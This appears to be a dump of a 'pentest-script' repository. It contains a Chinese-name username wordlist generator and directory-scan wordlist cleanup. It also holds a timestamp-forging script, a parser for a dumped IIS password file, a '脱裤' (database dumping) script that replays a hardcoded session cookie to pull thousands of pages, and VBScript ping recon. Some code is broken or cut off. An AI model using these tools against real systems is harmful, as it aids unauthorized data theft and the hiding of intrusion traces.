liudan 129 | lixin 130 | wangli 131 | yangjing 132 | liuchao 133 | zhangjuan 134 | yangfan 135 | liuyan 136 | liuying 137 | lixue 138 | lixiu 139 | zhangxin 140 | wangjian 141 | liuyu 142 | liuhui 143 | liubo 144 | zhanghao 145 | zhangming 146 | chenyan 147 | zhangxia 148 | chenyan 149 | yangjie 150 | wangshuai 151 | lihui 152 | wangxue 153 | yangjun 154 | zhangxu 155 | liugang 156 | wanghua 157 | yangmin 158 | wangning 159 | lining 160 | wangjun 161 | liubin 162 | zhangping 163 | wangting 164 | chentao 165 | wangyu 166 | wangna 167 | zhangbin 168 | chenlong 169 | lilin 170 | zhangfeng 171 | wanghong 172 | lifeng 173 | yangyang 174 | liting 175 | zhangjun 176 | wanglin 177 | chenying 178 | chenjun 179 | liuxia 180 | chenhao 181 | zhangkai 182 | wangjing 183 | chenfang 184 | zhangting 185 | yangtao 186 | yangbo 187 | chenhong 188 | liuhuan 189 | chenjuan 190 | chengang 191 | wanghui 192 | zhangying 193 | zhanglin 194 | zhangna 195 | zhangyu 196 | wangfeng 197 | liujia 198 | liulei 199 | zhangqian 200 | liupeng 201 | wangxu 202 | zhangxue 203 | liyang 204 | zhangxiu 205 | wangmei 206 | 
wangjian 207 | wangying 208 | liuping 209 | yangmei 210 | lifei 211 | wangliang 212 | lilei 213 | lijian 214 | wangyu 215 | chenling 216 | zhangjian 217 | liuxin 218 | wangqian 219 | zhangshuai 220 | lijian 221 | chenlin 222 | liyang 223 | chenqiang 224 | zhaojing 225 | wangcheng 226 | chenchao 227 | chenliang 228 | liuna 229 | wangqin 230 | zhanglan 231 | zhanghui 232 | liuchang 233 | liqian 234 | yangyan 235 | zhangliang 236 | liyun 237 | zhangqin 238 | wanglan 239 | liuping 240 | chengui 241 | liuying 242 | yangchao 243 | zhangmei 244 | chenping 245 | liuhong 246 | zhaowei 247 | zhangyun 248 | zhangning 249 | yanglin 250 | zhangjie 251 | gaofeng 252 | yangyang 253 | chenhua 254 | yanghua 255 | yangliu 256 | liuyang 257 | wangshu 258 | yangfang 259 | lichun 260 | liujun 261 | wanghai 262 | liuling 263 | chenchen 264 | wanghuan 265 | lidong 266 | zhanglong 267 | chenbo 268 | chenlei 269 | wangyun 270 | wangfeng 271 | wangrui 272 | liqin 273 | chenpeng 274 | wangying 275 | liufei 276 | chenming 277 | wanggui 278 | lihao 279 | wangzhi 280 | zhangdan 281 | lifeng 282 | liufeng 283 | lijia 284 | chenhui 285 | zhangfang 286 | lilan 287 | chenyu 288 | chenxia 289 | liukai 290 | liuhua 291 | libing 292 | zhanglei 293 | wangdong 294 | wanglin 295 | liying 296 | yangwei 297 | wanglong 298 | liuting 299 | chenxiu 300 | liuming 301 | zhoumin 302 | huangwei 303 | zhanghai 304 | lizhi 305 | yanglei 306 | lijing 307 | liujian 308 | zhaomin 309 | chenyun 310 | lihai 311 | zhanggui 312 | zhangjing 313 | liuli 314 | likai 315 | zhangfeng 316 | zhangzhi 317 | lilong 318 | lishuai 319 | lixin 320 | liuyun 321 | lijie 322 | wangchun 323 | chenbin 324 | zhangying 325 | chenfei 326 | wangbo 327 | liuhao 328 | huangxiu 329 | lishu 330 | huangyong 331 | zhouwei 332 | libin 333 | wangkun 334 | liuhui 335 | lixiang 336 | zhangrui 337 | liushuai 338 | zhangfei 339 | wangyang 340 | chenjie 341 | wangrong 342 | wuxiu 343 | yangming 344 | mali 345 | liuqian 346 | yangling 347 | yangping 348 | 
wangbin 349 | liliang 350 | lirong 351 | lilin 352 | liyan 353 | wangbing 354 | wangming 355 | chenmei 356 | zhangchun 357 | liyang 358 | wangyan 359 | wangdong 360 | liufeng 361 | yangxue 362 | maxiu 363 | zhangshu 364 | lixiao 365 | zhangbo 366 | wangxin 367 | zhaoli 368 | zhanglin 369 | huangmin 370 | yangjuan 371 | wangjin 372 | zhoujie 373 | wanglei 374 | chenjian 375 | liumei 376 | yanggui 377 | sunxiu 378 | zhaojun 379 | zhaoyong 380 | liubing 381 | yangbin 382 | liwen 383 | chenlin 384 | chenping 385 | sunwei 386 | zhangli 387 | chenjun 388 | zhangnan 389 | liuyu 390 | zhaoxiu 391 | libo 392 | wangli 393 | zhangrong 394 | zhangfan 395 | zhangyu 396 | zhouyong 397 | zhangkun 398 | xuwei 399 | liuqin 400 | zhoujing 401 | xumin 402 | xujing 403 | yanghong 404 | wanglu 405 | zhangwen 406 | yangyan 407 | zhouli 408 | chenxin 409 | machao 410 | -------------------------------------------------------------------------------- /Python/top500/Top500Name_cn.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/Python/top500/Top500Name_cn.txt -------------------------------------------------------------------------------- /Python/top500/main.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | #top500中文名转全拼 3 | #使用:https://pypi.python.org/pypi/pinyin4py ps这个说明文档简直shit! 
4 | 5 | 6 | from pinyin import * 7 | 8 | 9 | NameList=['张伟','王伟','王芳','李伟','李娜','张敏','李静','王静','刘伟','王秀英','张丽','李秀英','王丽','张静','张秀英','李强','王敏','李敏','王磊','刘洋','王艳','王勇','李军','张勇','李杰','张杰','张磊','王强','李娟','王军','张艳','张涛','王涛','李艳','王超','李明','李勇','王娟','刘杰','刘敏','李霞','李丽','张军','王杰','张强','王秀兰','王刚','王平','刘芳','张燕','刘艳','刘军','李平','王辉','王燕','陈静','刘勇','李玲','李桂英','王丹','李刚','李丹','李萍','王鹏','刘涛','陈伟','张华','刘静','李涛','王桂英','张秀兰','李红','李超','刘丽','张桂英','王玉兰','李燕','张鹏','李秀兰','张超','王玲','张玲','李华','王飞','张玉兰','王桂兰','王英','刘强','陈秀英','李英','李辉','李梅','陈勇','王鑫','李芳','张桂兰','李波','杨勇','王霞','李桂','王斌','李鹏','张平','张莉','张辉','张宇','刘娟','李斌','王浩','陈杰','王凯','陈丽','陈敏','王秀','李玉','刘秀','王萍','张波','刘桂','杨秀','张英','杨丽','张健','李俊','李莉','王波','张红','刘丹','李鑫','王莉','杨静','刘超','张娟','杨帆','刘燕','刘英','李雪','李秀','张鑫','王健','刘玉','刘辉','刘波','张浩','张明','陈燕','张霞','陈艳','杨杰','王帅','李慧','王雪','杨军','张旭','刘刚','王华','杨敏','王宁','李宁','王俊','刘斌','张萍','王婷','陈涛','王玉','王娜','张斌','陈龙','李林','张凤','王红','李凤','杨洋','李婷','张俊','王林','陈英','陈军','刘霞','陈浩','张凯','王晶','陈芳','张婷','杨涛','杨波','陈红','刘欢','陈娟','陈刚','王慧','张颖','张林','张娜','张玉','王凤','刘佳','刘磊','张倩','刘鹏','王旭','张雪','李阳','张秀','王梅','王建','王颖','刘平','杨梅','李飞','王亮','李磊','李建','王宇','陈玲','张建','刘鑫','王倩','张帅','李健','陈林','李洋','陈强','赵静','王成','陈超','陈亮','刘娜','王琴','张兰','张慧','刘畅','李倩','杨艳','张亮','李云','张琴','王兰','刘萍','陈桂','刘颖','杨超','张梅','陈平','刘红','赵伟','张云','张宁','杨林','张洁','高峰','杨阳','陈华','杨华','杨柳','刘阳','王淑','杨芳','李春','刘俊','王海','刘玲','陈晨','王欢','李冬','张龙','陈波','陈磊','王云','王峰','王瑞','李琴','陈鹏','王莹','刘飞','陈明','王桂','李浩','王志','张丹','李峰','刘凤','李佳','陈辉','张芳','李兰','陈玉','陈霞','刘凯','刘华','李兵','张雷','王东','王琳','李颖','杨伟','王龙','刘婷','陈秀','刘明','周敏','黄伟','张海','李志','杨磊','李晶','刘建','赵敏','陈云','李海','张桂','张晶','刘莉','李凯','张峰','张志','李龙','李帅','李欣','刘云','李洁','王春','陈斌','张莹','陈飞','王博','刘浩','黄秀','李淑','黄勇','周伟','李彬','王坤','刘慧','李想','张瑞','刘帅','张飞','王洋','陈洁','王荣','吴秀','杨明','马丽','刘倩','杨玲','杨平','王彬','李亮','李荣','李琳','李岩','王兵','王明','陈梅','张春','李杨','王岩','王冬','刘峰','杨雪','马秀','张淑','李小','张博','王欣','赵丽','张琳','黄敏','杨娟','王金','周杰','王雷','陈建','刘梅','杨桂','孙秀','赵军','赵勇','刘兵','杨斌','李文','陈琳','陈萍','孙伟','张利','
陈俊','张楠','刘宇','赵秀','李博','王利','张荣','张帆','张瑜','周勇','张坤','徐伟','刘琴','周静','徐敏','徐静','杨红','王璐','张文','杨燕','周丽','陈鑫','马超'] 10 | 11 | s=Converter() 12 | 13 | f = open('top500Name.txt','w') 14 | for i in NameList: 15 | tmp = s.convert(i) 16 | tmp = tmp.split(' ') 17 | tmp = ''.join(tmp) 18 | print tmp 19 | f.write('%s\n'%tmp) 20 | f.close() 21 | -------------------------------------------------------------------------------- /Python/top500/pinyin/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | import os 4 | import re 5 | 6 | _punctuation_mapper = dict(zip( 7 | u'?!。,、:《》“”‘’ ', 8 | u'?!.,,:<>""\'\' ')) 9 | 10 | def _load_character_mapper(): 11 | mapper = dict() 12 | filename = os.path.dirname(__file__) 13 | filename += '/chars.txt' 14 | f = open(filename) 15 | try: 16 | for line in f: 17 | if re.match('^[\s]*#', line): 18 | continue 19 | line = line.strip() 20 | columns = re.split('[\s(,)]+', line) 21 | ch = unichr(int(columns[0], 16)) 22 | pinyin = columns[1:-1] 23 | if len(pinyin) > 1: 24 | mapper[ch] = pinyin 25 | else: 26 | mapper[ch] = pinyin[0] 27 | finally: 28 | f.close() 29 | return mapper 30 | 31 | _character_mapper = _load_character_mapper() 32 | 33 | class Tokenizer: 34 | def __init__(self, text): 35 | assert isinstance(text, unicode) 36 | 37 | self._text = text 38 | self._pos = 0 39 | self._length = len(text) 40 | 41 | def __iter__(self): 42 | return self 43 | 44 | def next(self): 45 | if self._pos >= self._length: 46 | raise StopIteration 47 | 48 | i = self._pos 49 | type = self._char_type(self._text[i]) 50 | 51 | while True: 52 | i += 1 53 | if i >= self._length or self._char_type(self._text[i]) != type: 54 | break 55 | 56 | try: 57 | return type, self._text[self._pos:i] 58 | finally: 59 | self._pos = i 60 | 61 | def _char_type(self, ch): 62 | if re.match('[\s]', ch): 63 | return 4 64 | elif ch in _punctuation_mapper: 65 | return 3 66 | elif ord(ch) <= 255: 67 | return 1 68 | 
else: 69 | return 2 70 | 71 | class WordMapper: 72 | def __init__(self): 73 | self._mapper = dict() 74 | 75 | def load_from_file(self, filename): 76 | f = open(filename) 77 | try: 78 | for line in f: 79 | if re.match('^[\s]*#', line): 80 | continue 81 | line = line.strip() 82 | columns = re.split('[\s]+', line) 83 | word = unicode(columns[0], 'UTF-8') 84 | pinyin = columns[1:] 85 | self[word] = pinyin 86 | finally: 87 | f.close() 88 | 89 | def __setitem__(self, word, pinyin): 90 | assert isinstance(word, unicode) 91 | 92 | mapper = self._mapper 93 | for ch in word: 94 | if not ch in mapper: 95 | mapper[ch] = dict() 96 | mapper = mapper[ch] 97 | 98 | mapper['PY'] = pinyin 99 | 100 | def __getitem__(self, word): 101 | assert isinstance(word, unicode) 102 | 103 | length = len(word) 104 | 105 | pinyin = [] 106 | pos = 0 107 | last_pinyin = None 108 | last_pos = 0 109 | mapper = self._mapper 110 | 111 | while pos < length: 112 | ch = word[pos] 113 | if ch in mapper: 114 | mapper = mapper[ch] 115 | if 'PY' in mapper: 116 | last_pinyin = mapper['PY'] 117 | last_pos = pos 118 | pos += 1 119 | if pos < length: 120 | continue 121 | 122 | if last_pinyin is None: 123 | ch = word[last_pos] 124 | if ch in _character_mapper: 125 | last_pinyin = _character_mapper[ch] 126 | else: 127 | last_pinyin = ch 128 | if len(last_pinyin) > 1: 129 | pinyin.append(last_pinyin) 130 | else: 131 | pinyin.extend(last_pinyin) 132 | else: 133 | pinyin.extend(last_pinyin) 134 | 135 | pos = last_pos + 1 136 | mapper = self._mapper 137 | last_pinyin = None 138 | last_pos = pos 139 | 140 | if last_pinyin is not None: 141 | pinyin.extend(last_pinyin) 142 | 143 | return pinyin 144 | 145 | class Converter: 146 | def __init__(self, word_mapper=WordMapper()): 147 | self._word_mapper = word_mapper 148 | 149 | def load_word_file(self, filename): 150 | self._word_mapper.load_from_file(filename) 151 | 152 | def convert(self, text, fmt='df', sc=True, pp=False, fuzzy=0): 153 | if not isinstance(text, unicode): 154 
| text = unicode(text, 'UTF-8') 155 | 156 | tokenizer = Tokenizer(text) 157 | tokens = map(self._convert_token, tokenizer) 158 | 159 | pinyin = '' 160 | last_type = 4 161 | for type, word in tokens: 162 | if type == 2: 163 | if last_type != 4: 164 | pinyin += ' ' 165 | pinyin += self._format_word(word, fmt, sc, pp, fuzzy) 166 | pass 167 | elif type == 3: 168 | pinyin += word 169 | elif type == 4: 170 | pinyin += word 171 | else: 172 | if last_type == 2: 173 | pinyin += ' ' 174 | pinyin += word 175 | 176 | last_type = type 177 | 178 | return pinyin 179 | 180 | def _convert_token(self, token): 181 | type, word = token 182 | if type == 2: 183 | return type, self._word_mapper[word] 184 | elif type == 3: 185 | return type, _punctuation_mapper[word] 186 | else: 187 | return type, word.encode('UTF-8') 188 | 189 | def _format_word(self, word, fmt, sc, pp, fuzzy): 190 | if pp and not sc: 191 | pinyin_set = set() 192 | pinyin_list = [None] * len(word) 193 | def func(idx): 194 | if idx >= len(word): 195 | pinyin_set.add(''.join(pinyin_list)) 196 | return 197 | ch = word[idx] 198 | if isinstance(ch, list): 199 | for c in ch: 200 | pinyin_list[idx] = self._format_ch(c, fmt, fuzzy) 201 | func(idx+1) 202 | else: 203 | pinyin_list[idx] = self._format_ch(ch, fmt, fuzzy) 204 | func(idx+1) 205 | func(0) 206 | return '|'.join(pinyin_set) 207 | 208 | def func(ch): 209 | if isinstance(ch, list): 210 | pinyin_list = [] 211 | if pp: 212 | for c in ch: 213 | pinyin_list.append(self._format_ch(c, fmt, fuzzy)) 214 | else: 215 | pinyin_list.append(self._format_ch(ch[0], fmt, fuzzy)) 216 | return '|'.join(set(pinyin_list)) 217 | else: 218 | return self._format_ch(ch, fmt, fuzzy) 219 | 220 | pinyin_list = map(func, word) 221 | if sc: 222 | return ' '.join(pinyin_list) 223 | else: 224 | return ''.join(pinyin_list) 225 | 226 | def _format_ch(self, ch, fmt, fuzzy): 227 | if fuzzy > 0: 228 | raise Exception('Not implemented') 229 | 230 | if fmt == 'df': 231 | return ch[:-1] 232 | 233 | if fmt == 
'tn': 234 | return ch 235 | 236 | if fmt == 'fl': 237 | return ch[0] 238 | 239 | raise Exception('Not implemented') 240 | -------------------------------------------------------------------------------- /Python/top500/pinyin/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/Python/top500/pinyin/__init__.pyc -------------------------------------------------------------------------------- /Python/修改文件名/加后缀.py: -------------------------------------------------------------------------------- 1 | #encoding=utf-8 2 | import os 3 | import os.path 4 | import sys 5 | rootdir = "." # 指明被遍历的文件夹 6 | sufix='.txt' 7 | thiefile=sys.argv[0][sys.argv[0].rfind(os.sep)+1:] 8 | 9 | for parent,dirnames,filenames in os.walk(rootdir): #三个参数:分别返回1.父目录 2.所有文件夹名字(不含路径) 3.所有文件名字 10 | for filename in filenames: 11 | if thiefile!=filename: 12 | print filename 13 | st=str( os.path.join(parent,filename)) #输出文件路径信息 14 | r = "/".join(st[1:].split("\\")) 15 | sorpath="."+r 16 | os.rename(sorpath,sorpath+".txt") 17 | 18 | 19 | -------------------------------------------------------------------------------- /Python/修改文件名/改成特定文件名.py.txt: -------------------------------------------------------------------------------- 1 | #encoding=utf-8 2 | import sys, string, os, shutil 3 | #输入目录名和前缀名,重命名后的名称结构类似prefix_0001 4 | def RenameFiles(srcdir, prefix): 5 | srcfiles = os.listdir(srcdir) 6 | index = 1 7 | for srcfile in srcfiles: 8 | srcfilename = os.path.splitext(srcfile)[0][1:] 9 | sufix = os.path.splitext(srcfile)[1] 10 | #根据目录下具体的文件数修改%号后的值,"%04d"最多支持9999 11 | destfile = srcdir + "//" + prefix + "_%04d"%(index) + sufix 12 | srcfile = os.path.join(srcdir, srcfile) 13 | os.rename(srcfile, destfile) 14 | index += 1 15 | srcdir = "." 
16 | prefix = "IMG_2011" 17 | RenameFiles(srcdir, prefix) 18 | -------------------------------------------------------------------------------- /Python/修改文件时间戳/单个.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | import os,sys,time 4 | from stat import * 5 | filename='./123.py' 6 | #指定期望修改后的时间 7 | TimeForChange = '2007-01-10 07:51:21' 8 | #转换时间格式为long型 9 | ConverTime = time.mktime(time.strptime( TimeForChange,'%Y-%m-%d %H:%M:%S') ) 10 | print TimeForChange+' 转换后:'+str(ConverTime) 11 | 12 | print '-------------修改前----------------' 13 | #创建时间 14 | print '创建时间 '+time.ctime(os.path.getctime(filename)) 15 | #最后修改时间 16 | print '修改时间 '+time.ctime(os.path.getmtime(filename)) 17 | #访问时间 18 | print '访问时间 '+time.ctime(os.path.getatime(filename)) 19 | 20 | #修改文件时间戳 21 | times=(ConverTime,ConverTime) 22 | #进行修改 23 | os.utime(filename, times) 24 | 25 | print '-------------修改后----------------' 26 | #创建时间 27 | print '创建时间 '+time.ctime(os.path.getctime(filename)) 28 | #最后修改时间 29 | print '修改时间 '+time.ctime(os.path.getmtime(filename)) 30 | #访问时间 31 | print '访问时间 '+time.ctime(os.path.getatime(filename)) 32 | #ref:http://2hei.net/mt/2008/12/wndows-use-python-edit-filetime.html -------------------------------------------------------------------------------- /Python/修改文件时间戳/批量当前目录.py: -------------------------------------------------------------------------------- 1 | #encoding=utf-8 2 | import os,sys,time 3 | from stat import * 4 | import os.path 5 | rootdir = "." 
# 指明被遍历的文件夹 6 | 7 | TimeForChange = '2015-05-20 13:14:01' 8 | ConverTime = time.mktime(time.strptime( TimeForChange,'%Y-%m-%d %H:%M:%S') ) 9 | times=(ConverTime,ConverTime) 10 | 11 | for parent,dirnames,filenames in os.walk(rootdir): #三个参数:分别返回1.父目录 2.所有文件夹名字(不含路径) 3.所有文件名字 12 | for filename in filenames: #输出文件信息 13 | st=str( os.path.join(parent,filename)) #输出文件路径信息 14 | r = "/".join(st[1:].split("\\")) 15 | filename = '.'+r 16 | os.utime(filename, times) 17 | #r.replace('ala_api',sss).replace('ALA_API',ttt) 18 | print filename 19 | #result.write(r+'\n') 20 | 21 | 22 | #result.close() 23 | -------------------------------------------------------------------------------- /Python/单个替换xml.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import os 3 | 4 | os.chdir('d:\\') # 指定目录 5 | if not os.path.exists('pp.txt'): # 看一下这个文件是否存在 6 | exit(-1) #,不存在就退出 7 | 8 | lines = open('pp.txt').readlines() #打开文件,读入每一行 9 | 10 | fp = open('pp2.txt','w') #打开你要写得文件pp2.txt 11 | for s in lines: 12 | fp.write( s.replace('love','hate').replace('yes','no')) #替换两次 13 | fp.close() 14 | -------------------------------------------------------------------------------- /Python/处理iispwd/a.py: -------------------------------------------------------------------------------- 1 | import re 2 | import http.client 3 | 4 | def getResponseCode(url): 5 | conn = http.client.HTTPConnection(url,80,timeout=10) 6 | 7 | try: 8 | conn.request("GET", "/") 9 | r1 = conn.getresponse() 10 | return r1.status 11 | except: 12 | pass 13 | return 0 14 | 15 | 16 | 17 | 18 | 19 | 20 | def Readiispwd(filename,domainlist): 21 | 22 | f = open(filename) 23 | for line in f: 24 | #print (line) 25 | line = line.split(' ') 26 | #print (line) 27 | try: 28 | 29 | if len(line)<4: 30 | pass 31 | else: 32 | homelocate=line[len(line)-1] 33 | #print (homelocate) 34 | 35 | domainstring=line[len(line)-2].split(':') 36 | #print(domainstring) 37 | for j in domainstring: 38 | if 
len(j)<3: 39 | pass 40 | else: 41 | j=j.split('.') 42 | if len(j)==2: 43 | domainname='.'.join(j) 44 | domainname=domainname.split(',')[0] 45 | 46 | #print('%s\t%s'%(domainname,homelocate)) 47 | domainlist.append(domainname) 48 | domainlist.append(homelocate) 49 | 50 | 51 | else: 52 | pass 53 | 54 | 55 | except IndexError: 56 | pass 57 | f.close() 58 | ############################################ 59 | domainlist=[] 60 | Readiispwd('njwinweb10iispwd.txt',domainlist) 61 | #print (domainlist) 62 | print('200 response && domain domain location') 63 | result=open("result.txt",'a') 64 | for i in range(0,len(domainlist)-2,2): 65 | #print (i) 66 | if getResponseCode(domainlist[i])==200: 67 | result.write('%s\t%s\n'%(domainlist[i],domainlist[i+1])) 68 | print('%s\t%s'%(domainlist[i],domainlist[i+1])) 69 | 70 | 71 | result.close() 72 | 73 | -------------------------------------------------------------------------------- /Python/批量替换xml.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import os 3 | 4 | os.chdir('d:\\tuniu.com\\ccc') 5 | 6 | if not os.path.exists('zbx_export_templates.xml'): 7 | exit(-1) 8 | 9 | lll =['pay_site_wap','pay_csahier_wap'] 10 | for i in lll: 11 | sss=i 12 | ttt = sss.upper() 13 | lines = open('zbx_export_templates.xml').readlines() 14 | 15 | fp = open(sss+'_export_templates.xml','w') 16 | for s in lines: 17 | fp.write( s.replace('ala_api',sss).replace('ALA_API',ttt)) 18 | fp.close() 19 | -------------------------------------------------------------------------------- /Python/目录扫描整理/Thumbs.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/Python/目录扫描整理/Thumbs.db -------------------------------------------------------------------------------- /Python/目录扫描整理/del.py: -------------------------------------------------------------------------------- 1 | 
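#-*- coding: UTF-8 -*-
import shutil
import os
from os import walk


def delrep(source):
    """Rewrite *source* with duplicate lines removed, keeping first occurrences.

    The de-duplicated content is first written to ``temp.xxoo`` in the
    current working directory; the original file is then renamed to
    ``<source>rdv_bak`` and the temp file is moved into its place.

    Args:
        source: Path of the text file to de-duplicate.

    Raises:
        OSError: If *source* cannot be read or either rename fails
            (for example when ``<source>rdv_bak`` already exists).
    """
    destination = source + 'rdv_bak'

    lines_seen = set()
    # Both handles are closed before the renames below, so neither file is
    # still open when it is moved (the original never closed the input file).
    with open(source, "r") as infile, open("temp.xxoo", "w") as outfile:
        for line in infile:
            # Lines are compared verbatim, including their line ending.
            if line not in lines_seen:
                outfile.write(line)
                lines_seen.add(line)

    os.renames(source, destination)
    os.renames("temp.xxoo", source)


# De-duplicate every .txt / .list wordlist below this folder.
for dirpath, dirnames, filenames in walk('D:\\workspace\\目录扫描\\url字典\\'):
    for filename in filenames:
        # os.path.join: os.walk yields sub-directory paths without a trailing
        # separator, so plain ``dirpath + filename`` only worked for the root.
        path = os.path.join(dirpath, filename)
        print(' File', path)
        if filename.split('.')[-1] in ('txt', 'list'):
            delrep(path)

# --------------------------------------------------------------------------------
# /Python/目录扫描整理/temp.xxoo:
# https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/Python/目录扫描整理/temp.xxoo
# (presumably a leftover temp.xxoo written by delrep() that was committed
# alongside the script)
# --------------------------------------------------------------------------------
# /Python/目录扫描整理/删除乱码.py:
# --------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
import codecs

# Read the file in up to 9999 pieces and print each one, reporting (instead
# of aborting on) pieces that fail to decode.  The file is opened read-only
# with the platform default encoding -- NOTE(review): an explicit encoding=
# would likely avoid the decode errors this loop works around; confirm the
# file's actual encoding.  The ``with`` block guarantees the handle is closed
# (the original called ``fileHandler.close`` without parentheses, so it never
# closed the file).
with open('D:\\workspace\\目录扫描\\布神php路径adminphp (2).txt', 'r') as fileHandler:
    for i in range(1, 10000):
        try:
            # NOTE(review): readline(i) returns at most i characters of the
            # next line, not line number i -- confirm this is the intent.
            line = fileHandler.readline(i)
            print(line)
        except UnicodeDecodeError:
            print('xxxxx')

# --------------------------------------------------------------------------------
# /Python/目录扫描整理/删除同名hash同.py:
# --------------------------------------------------------------------------------
# -*- coding: utf-8 -*-

import os
import hashlib
from functools import partial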
from os import walk 7 | 8 | def md5sum(filename): 9 | with open(filename, mode='rb') as f: 10 | d = hashlib.md5() 11 | for buf in iter(partial(f.read, 128), b''): 12 | d.update(buf) 13 | return d.hexdigest() 14 | 15 | hashl=list() 16 | 17 | 18 | for dirpath, dirnames, filenames in walk('D:\\workspace\\目录扫描\\'): 19 | #print ('Directory', dirpath) 20 | for filename in filenames: 21 | print (' File', dirpath+filename) 22 | try: 23 | md=md5sum(dirpath+filename) 24 | if md in hashl: 25 | os.remove(dirpath+filename) 26 | else: 27 | hashl.append(md) 28 | print(md) 29 | except FileNotFoundError: 30 | pass 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | #print(md5sum('c:\\windows\\IME\\SPTIP.DLL')) 44 | -------------------------------------------------------------------------------- /Python/目录扫描整理/删除文件重复的行.py: -------------------------------------------------------------------------------- 1 | # 2 | import shutil 3 | import os 4 | source="综合目录.txt" 5 | 6 | destination = "bak_"+ source 7 | 8 | lines_seen = set() 9 | outfile = open("temp.txt", "w") 10 | for line in open(source, "r"): 11 | print(line) 12 | if line not in lines_seen: 13 | outfile.write(line) 14 | lines_seen.add(line) 15 | 16 | outfile.close() 17 | os.renames(source,destination) 18 | os.renames( "temp.txt",source) 19 | -------------------------------------------------------------------------------- /Python/脱裤py脚本/自定义cookie批量GET(POST).py: -------------------------------------------------------------------------------- 1 | #encoding=utf8 2 | import urllib 3 | import urllib2 4 | import cookielib 5 | import Cookie 6 | from cookielib import Cookie as libcookie 7 | 8 | def parse(rawstr,url): 9 | url = '.'+'.'.join(url.split('.')[1:]) 10 | c = Cookie.SimpleCookie() 11 | c.load(rawstr) 12 | ret = [] 13 | for k in c: 14 | #get v as Morsel Object 15 | v = c[k] 16 | ret.append(libcookie( 17 | name=v.key, 18 | value = v.value, 19 | version=0, 20 | port=None, 21 | port_specified = False, 22 | domain=url, 23 
| domain_specified=True, 24 | domain_initial_dot=True, 25 | path='/', 26 | path_specified=True, 27 | secure=False, 28 | expires=None, 29 | discard=False, 30 | comment=None, 31 | comment_url=None, 32 | rest={'HttpOnly': None}, 33 | rfc2109=False, 34 | )) 35 | return ret 36 | 37 | 38 | 39 | 40 | ###登录页的url 41 | #lgurl = 'http://.com/ogi09' 42 | 43 | 44 | ###用cookielib模块创建一个对象,再用urlllib2模块创建一个cookie的handler 45 | cookie = cookielib.CookieJar() 46 | cs = parse("JSESSIONID=DC0B117570736F7120EF4679B1C06797",".com") 47 | for c in cs: 48 | cookie.set_cookie(c) 49 | print cookie 50 | cookieProc = urllib2.HTTPCookieProcessor(cookie) 51 | opener = urllib2.build_opener(cookieProc) 52 | urllib2.install_opener(opener) 53 | 54 | ###有些网站反爬虫,这里用headers把程序伪装成浏览器 55 | hds = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36' } 56 | 57 | ###登录需要提交的表单 58 | 59 | 60 | #req = urllib2.Request(url = lgurl,headers = hds) #伪装成浏览器,访问该页面,并POST表单数据,这里并没有实际访问,只是创建了一个有该功能的对象 61 | #opener = urllib2.build_opener(cookie_handler) #绑定handler,创建一个自定义的opener 62 | #response = opener.open(req)#请求网页,返回句柄 63 | #page = response.read()#读取并返回网页内容 64 | 65 | f = open('data.txt', 'a') 66 | for i in range(1,3956): 67 | print i 68 | dataurl = "http://l" % i 69 | req1 = urllib2.Request(url = dataurl,data = '',headers = hds) 70 | resp = opener.open(req1) 71 | page = resp.read() 72 | f.write(page) 73 | f.write("\n") 74 | print "\n" 75 | 76 | f.close() 77 | #print page #打印到终端显示 78 | -------------------------------------------------------------------------------- /Python/遍历子目录和路径.py: -------------------------------------------------------------------------------- 1 | #encoding=utf-8 2 | import os 3 | import os.path 4 | rootdir = "." 
# 指明被遍历的文件夹 5 | result = open('dir_result.txt','w') 6 | 7 | 8 | for parent,dirnames,filenames in os.walk(rootdir): #三个参数:分别返回1.父目录 2.所有文件夹名字(不含路径) 3.所有文件名字 9 | for filename in filenames: #输出文件信息 10 | st=str( os.path.join(parent,filename)) #输出文件路径信息 11 | r = "/".join(st[1:].split("\\")) 12 | print r 13 | result.write(r+'\n') 14 | 15 | for item in os.walk(rootdir): 16 | r = "/".join(item[0][1:].split("\\")) 17 | print r+'/' 18 | result.write(r+'/'+'\n') 19 | 20 | 21 | result.close() 22 | 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Pentest Script 2 | 3 | - [Burp Suite 插件](https://github.com/xiaoxiaoleo/pentest-script/blob/master/Burp%20Suite%20Extender.md) -------------------------------------------------------------------------------- /Recon-windows/ping.vbs: -------------------------------------------------------------------------------- 1 | lists = " 2 | hostname1 3 | hostname2" 4 | 5 | aMachines = lists.split(vbCrLf.ToCharArray, System.StringSplitOptions.RemoveEmptyEntries) 6 | For Each machine in aMachines 7 | Set objPing = GetObject("winmgmts:{impersonationLevel=impersonate}")._ 8 | ExecQuery("select * from Win32_PingStatus where address = '"& machine & "'") 9 | For Each objStatus in objPing 10 | If IsNull(objStatus.StatusCode) or objStatus.StatusCode<>0 Then 11 | s1 = s1 &vbcr& machine 12 | Else 13 | s2 = s2 &vbcr& machine 14 | End If 15 | Next 16 | Next 17 | 18 | Set fso=CreateObject("Scripting.Filesystemobject") 19 | Set f=fso.CreateTextFile("c:\windows\temp\log.txt",True) 20 | f.Write "ping success£º"&vbCrLf&s2 21 | f.close 22 | 23 | 24 | WScript.Echo("c:\windows\temp\ping_log.txt") 25 | -------------------------------------------------------------------------------- /Recon-windows/user_detail_info.vbs: -------------------------------------------------------------------------------- 1 | On Error Resume Next 2 